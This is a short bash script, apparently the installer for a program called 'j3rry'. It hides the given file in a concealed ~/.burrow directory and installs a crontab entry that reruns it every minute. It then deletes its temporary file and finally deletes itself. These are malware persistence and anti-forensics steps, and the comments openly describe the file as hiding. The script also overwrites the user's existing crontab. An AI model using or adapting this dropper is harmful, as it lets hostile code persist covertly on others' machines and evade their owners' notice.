#!/bin/bash

burrow="/home/$USER/.burrow" #burrow needs to be defined before cron_job
cron_job="* * * * * timeout 55s $burrow/$1"


echo "$# positional parameters detected!"

if [ ! "$#" -eq 1 ]; then
	echo "Usage: $0 j3rry"
	exit 0
fi



mkdir "$burrow" && echo "Burrow created." || echo "[E] Burrow was not created..." # i need a directory for j3rry to hide in
mv "$1" "$burrow" && echo "$1 was hid succesfully!" || echo "[E] $1 was not hid..."
echo "$cron_job" > "/tmp/$1" && echo "Moved command to /tmp file" || echo "[E] Command was not moved to /tmp..." #you can only crontab a file, not a string
crontab "/tmp/$1" -u "$USER" && echo "Created crontab from /tmp file" || echo "[E] Crontab was not created..."
rm "/tmp/$1" #deletes crontab command temporary file
rm -- "$0" #deletes j3rry.setup
echo "Self terminating."
exit 0
